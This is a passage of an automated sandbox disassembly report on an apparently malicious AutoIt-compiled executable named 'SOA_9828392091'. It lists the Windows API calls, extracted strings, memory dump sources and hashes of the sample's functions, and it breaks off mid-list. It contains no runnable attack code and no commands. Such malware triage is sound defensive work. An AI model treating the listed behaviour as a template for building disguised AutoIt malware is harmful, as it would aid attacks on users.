                                      • Opcode ID: 8b4c827f27f5004bf26345838d09d7c8e9c405d67971867e434319e111ad0479
                                      • Instruction ID: 706148e1707226d80a3ede39b9b6f130f9768d321c64c1ee60653f83326ab215
                                      • Opcode Fuzzy Hash: 8b4c827f27f5004bf26345838d09d7c8e9c405d67971867e434319e111ad0479
                                      • Instruction Fuzzy Hash: 3B515B71916208BFDF109FA8DD88EAE7B79EF08320F114615F915AB2A0E7759A40DF90
                                      APIs
                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0099B7B0
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0099B7C1
                                      • CharNextW.USER32(0000014E), ref: 0099B7F0
                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0099B831
                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0099B847
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0099B858
                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0099B875
                                      • SetWindowTextW.USER32(?,0000014E), ref: 0099B8C7
                                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0099B8DD
                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 0099B90E
                                      • _memset.LIBCMT ref: 0099B933
                                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0099B97C
                                      • _memset.LIBCMT ref: 0099B9DB
                                      • SendMessageW.USER32 ref: 0099BA05
                                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 0099BA5D
                                      • SendMessageW.USER32(?,0000133D,?,?), ref: 0099BB0A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0099BB2C
                                      • GetMenuItemInfoW.USER32(?), ref: 0099BB76
                                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0099BBA3
                                      • DrawMenuBar.USER32(?), ref: 0099BBB2
                                      • SetWindowTextW.USER32(?,0000014E), ref: 0099BBDA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                      • String ID: 0
                                      • API String ID: 1073566785-4108050209
                                      • Opcode ID: 118857916dde667a6a811ada956a3d70316e355a8eba294f9a15b13a76d451dd
                                      • Instruction ID: 518b88f912ab8e517078dbee28792cebd6ad28aef6b5ed5b75bb51882359f7d8
                                      • Opcode Fuzzy Hash: 118857916dde667a6a811ada956a3d70316e355a8eba294f9a15b13a76d451dd
                                      • Instruction Fuzzy Hash: D5E19071900218EBDF20DFA9DD84EEE7B7CEF45724F108159FA19AA190D7788A41DF60
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 0099778A
                                      • GetDesktopWindow.USER32 ref: 0099779F
                                      • GetWindowRect.USER32(00000000), ref: 009977A6
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00997808
                                      • DestroyWindow.USER32(?), ref: 00997834
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0099785D
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0099787B
                                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009978A1
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 009978B6
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009978C9
                                      • IsWindowVisible.USER32(?), ref: 009978E9
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00997904
                                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00997918
                                      • GetWindowRect.USER32(?,?), ref: 00997930
                                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00997956
                                      • GetMonitorInfoW.USER32 ref: 00997970
                                      • CopyRect.USER32(?,?), ref: 00997987
                                      • SendMessageW.USER32(?,00000412,00000000), ref: 009979F2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                      • String ID: ($0$tooltips_class32
                                      • API String ID: 698492251-4156429822
                                      • Opcode ID: 845adcd56ce78237805fcc197e6233f4b0b7addd14aa51ab4eb3b12fa765ae1f
                                      • Instruction ID: a917c9f9b3748eafa439e040b38198580287e3b45f3a45fb27d0d0d0062a42fa
                                      • Opcode Fuzzy Hash: 845adcd56ce78237805fcc197e6233f4b0b7addd14aa51ab4eb3b12fa765ae1f
                                      • Instruction Fuzzy Hash: 06B17071618301AFDB04DFA9D985B5AFBE5FF88310F00891DF5999B291DB70E805CB91
                                      APIs
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0094A939
                                      • GetSystemMetrics.USER32(00000007), ref: 0094A941
                                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0094A96C
                                      • GetSystemMetrics.USER32(00000008), ref: 0094A974
                                      • GetSystemMetrics.USER32(00000004), ref: 0094A999
                                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0094A9B6
                                      • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0094A9C6
                                      • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0094A9F9
                                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0094AA0D
                                      • GetClientRect.USER32(00000000,000000FF), ref: 0094AA2B
                                      • GetStockObject.GDI32(00000011), ref: 0094AA47
                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0094AA52
                                        • Part of subcall function 0094B63C: GetCursorPos.USER32(000000FF), ref: 0094B64F
                                        • Part of subcall function 0094B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0094B66C
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000001), ref: 0094B691
                                        • Part of subcall function 0094B63C: GetAsyncKeyState.USER32(00000002), ref: 0094B69F
                                      • SetTimer.USER32(00000000,00000000,00000028,0094AB87), ref: 0094AA79
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                      • String ID: AutoIt v3 GUI
                                      • API String ID: 1458621304-248962490
                                      • Opcode ID: f0fd5ffd4329fa58713b3f2a9f0ce29c327f167cbe370113080335634e27da6b
                                      • Instruction ID: 075b82a7dd8261ec3c0cdeea6ecbd05eeaa7b72ecc5290883f43da6c1eed2757
                                      • Opcode Fuzzy Hash: f0fd5ffd4329fa58713b3f2a9f0ce29c327f167cbe370113080335634e27da6b
                                      • Instruction Fuzzy Hash: 28B18A71A4520ADFDB14DFA8CD45FAE7BB8FB48324F104229FA16E6290DB74D840DB91
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscat$C1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                      • API String ID: 2258151342-1459072770
                                      • Opcode ID: f35f50990fb65d4fdc274bfb51dbb8a9a0707f9802c130e48d707e20e4023c3c
                                      • Instruction ID: 054c18a2467734c46d49963ac09c15778abe179735ccae9e3f66063e279566c8
                                      • Opcode Fuzzy Hash: f35f50990fb65d4fdc274bfb51dbb8a9a0707f9802c130e48d707e20e4023c3c
                                      • Instruction Fuzzy Hash: 4341D172A00201BBEB11AB65CC47FBF776CEFC5714F044069FD05A2182FB759A05A7A2
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$Foreground
                                      • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                      • API String ID: 62970417-1919597938
                                      • Opcode ID: fd8b2fcbd5c0508e6e72b4cbe1257d676491a159dd9b9eff6fce19e2e40b5db1
                                      • Instruction ID: fa8134d0ab91be3bde1c64169a9de9e23fedbab00235c0f59908ae1e5952cae0
                                      • Opcode Fuzzy Hash: fd8b2fcbd5c0508e6e72b4cbe1257d676491a159dd9b9eff6fce19e2e40b5db1
                                      • Instruction Fuzzy Hash: 13D1C730508742ABCB18EF64C481BAABBB4FF96344F104A1DF496575A1DB30E99ACFD1
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00993735
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,009CDC00,00000000,?,00000000,?,?), ref: 009937A3
                                      • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 009937EB
                                      • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00993874
                                      • RegCloseKey.ADVAPI32(?), ref: 00993B94
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00993BA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                       • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Close$ConnectCreateRegistryValue
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 536824911-966354055
                                      • Opcode ID: 0338d5bfc7e786d0c3311f9927eaa6a4b9403e4f4ceded0c88f1b710ceb9e02a
                                      • Instruction ID: aef7c311688e415ea8165e16b245d0c8b867fb37b713125035db86ed2a5776f4
                                      • Opcode Fuzzy Hash: 0338d5bfc7e786d0c3311f9927eaa6a4b9403e4f4ceded0c88f1b710ceb9e02a
                                      • Instruction Fuzzy Hash: AD0239756046019FCB14EF19C995B2AB7E9FF89720F04895DF98A9B3A1DB30ED01CB81
                                      APIs
                                      • CharUpperBuffW.USER32(?,?), ref: 00996C56
                                      • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00996D16
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharMessageSendUpper
                                      • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                      • API String ID: 3974292440-719923060
                                      • Opcode ID: 3baaea21ef8d230cc071399c3cbcf03726eb9007b6f8b36229c34b609deefe25
                                      • Instruction ID: 4b682762f0306512f2ee8171fcc969535e4a363af700950062232a9f3d38e23d
                                      • Opcode Fuzzy Hash: 3baaea21ef8d230cc071399c3cbcf03726eb9007b6f8b36229c34b609deefe25
                                      • Instruction Fuzzy Hash: 48A15D706043459BCB14EF28C991F7AB3A5BF84314F14496DB8A6AB3D2EB34ED05CB51
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0096CF91
                                      • __swprintf.LIBCMT ref: 0096D032
                                      • _wcscmp.LIBCMT ref: 0096D045
                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0096D09A
                                      • _wcscmp.LIBCMT ref: 0096D0D6
                                      • GetClassNameW.USER32(?,?,00000400), ref: 0096D10D
                                      • GetDlgCtrlID.USER32(?), ref: 0096D15F
                                      • GetWindowRect.USER32(?,?), ref: 0096D195
                                      • GetParent.USER32(?), ref: 0096D1B3
                                      • ScreenToClient.USER32(00000000), ref: 0096D1BA
                                      • GetClassNameW.USER32(?,?,00000100), ref: 0096D234
                                      • _wcscmp.LIBCMT ref: 0096D248
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0096D26E
                                      • _wcscmp.LIBCMT ref: 0096D282
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                      • String ID: %s%u
                                      • API String ID: 3119225716-679674701
                                      • Opcode ID: b1f0e9fd0f2b07e1e8909050b7b49f3bb0a201892f85a0d11df7cfd7b93ddb27
                                      • Instruction ID: 1698914177d6fa032a690505f999e1cb136afca7e3dd1ba514b7b810cc53f47d
                                      • Opcode Fuzzy Hash: b1f0e9fd0f2b07e1e8909050b7b49f3bb0a201892f85a0d11df7cfd7b93ddb27
                                      • Instruction Fuzzy Hash: 5EA1C171A09306AFD715DF64C894FAAB7ACFF44354F008619F9B9D2190EB30EA45CB91
                                      APIs
                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0096D8EB
                                      • _wcscmp.LIBCMT ref: 0096D8FC
                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0096D924
                                      • CharUpperBuffW.USER32(?,00000000), ref: 0096D941
                                      • _wcscmp.LIBCMT ref: 0096D95F
                                      • _wcsstr.LIBCMT ref: 0096D970
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0096D9A8
                                      • _wcscmp.LIBCMT ref: 0096D9B8
                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0096D9DF
                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0096DA28
                                      • _wcscmp.LIBCMT ref: 0096DA38
                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0096DA60
                                      • GetWindowRect.USER32(00000004,?), ref: 0096DAC9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                      • String ID: @$ThumbnailClass
                                      • API String ID: 1788623398-1539354611
                                      • Opcode ID: 134278f05b7a686746e03ef9987af12821d11d36008afcbbe5a246d591091ed8
                                      • Instruction ID: 1a730723dafbd176da94e78cdcaf29013bac00320afe243104b7e7deec4c2c5d
                                      • Opcode Fuzzy Hash: 134278f05b7a686746e03ef9987af12821d11d36008afcbbe5a246d591091ed8
                                      • Instruction Fuzzy Hash: 1881D2316093059BDB05CF60C985FAA7BECFF84314F04846AFD999A096EB30DD45CBA1
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                      • API String ID: 1038674560-1810252412
                                      • Opcode ID: 2d28f05ba26b28403c248173744416247fea51710d2f2db5ad5d10e777f82093
                                      • Instruction ID: c9260bbdfebcb91754556a35f02b35799efe9540768b4ea4ac5cc351bca341ef
                                      • Opcode Fuzzy Hash: 2d28f05ba26b28403c248173744416247fea51710d2f2db5ad5d10e777f82093
                                      • Instruction Fuzzy Hash: B231BE71A44249AADB15EF62DE43FEDB3BC9FA1744F300069F851B20D1EB51AF08CA52
                                      APIs
                                      • LoadIconW.USER32(00000063), ref: 0096EAB0
                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0096EAC2
                                      • SetWindowTextW.USER32(?,?), ref: 0096EAD9
                                      • GetDlgItem.USER32(?,000003EA), ref: 0096EAEE
                                      • SetWindowTextW.USER32(00000000,?), ref: 0096EAF4
                                      • GetDlgItem.USER32(?,000003E9), ref: 0096EB04
                                      • SetWindowTextW.USER32(00000000,?), ref: 0096EB0A
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0096EB2B
                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0096EB45
                                      • GetWindowRect.USER32(?,?), ref: 0096EB4E
                                      • SetWindowTextW.USER32(?,?), ref: 0096EBB9
                                      • GetDesktopWindow.USER32 ref: 0096EBBF
                                      • GetWindowRect.USER32(00000000), ref: 0096EBC6
                                      • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0096EC12
                                      • GetClientRect.USER32(?,?), ref: 0096EC1F
                                      • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0096EC44
                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0096EC6F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                      • String ID:
                                      • API String ID: 3869813825-0
                                      • Opcode ID: ee5d2902d51990238620e2ba315e6af5fe627267a0eb5012fd1f971f273bed30
                                      • Instruction ID: e06f2ea48da3ba19751740ac7cee858779ad8eadecaff1730520e517a2c1e3e1
                                      • Opcode Fuzzy Hash: ee5d2902d51990238620e2ba315e6af5fe627267a0eb5012fd1f971f273bed30
                                      • Instruction Fuzzy Hash: 67514C75900709EFDB20DFA9CE89F6EBBF9FF04714F004A28E586A25A0D774A944DB50
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 009879C6
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 009879D1
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 009879DC
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 009879E7
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 009879F2
                                      • LoadCursorW.USER32(00000000,00007F81), ref: 009879FD
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00987A08
                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00987A13
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00987A1E
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00987A29
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00987A34
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00987A3F
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00987A4A
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00987A55
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00987A60
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00987A6B
                                      • GetCursorInfo.USER32(?), ref: 00987A7B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Cursor$Load$Info
                                      • String ID:
                                      • API String ID: 2577412497-0
                                      • Opcode ID: f7afd0ae4f4ab72c692677f88fc2281aad884ef4a6ca1c431ab40d637eabf477
                                      • Instruction ID: 035f0be8a079cfccc333f8b4e33d34820b190362ea31300d549ed6cccbe1e046
                                      • Opcode Fuzzy Hash: f7afd0ae4f4ab72c692677f88fc2281aad884ef4a6ca1c431ab40d637eabf477
                                      • Instruction Fuzzy Hash: 2B3103B1D4831A6ADB109FF68C8999FFFECFF04750F50452AA50DE7280DA78A5008FA1
                                      APIs
                                        • Part of subcall function 0094E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0093C8B7,?,00002000,?,?,00000000,?,0093419E,?,?,?,009CDC00), ref: 0094E984
                                        • Part of subcall function 0093660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009353B1,?,?,009361FF,?,00000000,00000001,00000000), ref: 0093662F
                                      • __wsplitpath.LIBCMT ref: 0093C93E
                                        • Part of subcall function 00951DFC: __wsplitpath_helper.LIBCMT ref: 00951E3C
                                      • _wcscpy.LIBCMT ref: 0093C953
                                      • _wcscat.LIBCMT ref: 0093C968
                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0093C978
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0093CABE
                                        • Part of subcall function 0093B337: _wcscpy.LIBCMT ref: 0093B36F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                      • API String ID: 2258743419-1018226102
                                      • Opcode ID: ecd7392705b9c4b1af33034266f7eac32d6088f56a06ee4bc6fb1995a0113c4d
                                      • Instruction ID: bcbbe3b7a51c6883b66513ecbdeedea419b77691292e70fceaf251ad2d39f36e
                                      • Opcode Fuzzy Hash: ecd7392705b9c4b1af33034266f7eac32d6088f56a06ee4bc6fb1995a0113c4d
                                      • Instruction Fuzzy Hash: B51270715083419FC724EF24C851AAFBBE9AFD9304F44891EF589A3261DB30DA49CF92
                                      APIs
                                      • _memset.LIBCMT ref: 0099CEFB
                                      • DestroyWindow.USER32(?,?), ref: 0099CF73
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0099CFF4
                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0099D016
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0099D025
                                      • DestroyWindow.USER32(?), ref: 0099D042
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00930000,00000000), ref: 0099D075
                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0099D094
                                      • GetDesktopWindow.USER32 ref: 0099D0A9
                                      • GetWindowRect.USER32(00000000), ref: 0099D0B0
                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0099D0C2
                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0099D0DA
                                        • Part of subcall function 0094B526: GetWindowLongW.USER32(?,000000EB), ref: 0094B537
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                      • String ID: 0$tooltips_class32
                                      • API String ID: 3877571568-3619404913
                                      • Opcode ID: 79b134b2c731ab549a9419ec4a591c1b0d37760f529c5199d9ad42b84a72fdf6
                                      • Instruction ID: d4b1ad581b7d62b8b443e19d4431589ebafde469ad32c1ab6152bafa66669a7d
                                      • Opcode Fuzzy Hash: 79b134b2c731ab549a9419ec4a591c1b0d37760f529c5199d9ad42b84a72fdf6
                                      • Instruction Fuzzy Hash: 4E71EEB0155305AFDB20CF28CC85FB67BE9EB88704F04461DF985872A1DB30E942DB62
                                      APIs
                                      • VariantInit.OLEAUT32(00000000), ref: 0097AB3D
                                      • VariantCopy.OLEAUT32(?,?), ref: 0097AB46
                                      • VariantClear.OLEAUT32(?), ref: 0097AB52
                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0097AC40
                                      • __swprintf.LIBCMT ref: 0097AC70
                                      • VarR8FromDec.OLEAUT32(?,?), ref: 0097AC9C
                                      • VariantInit.OLEAUT32(?), ref: 0097AD4D
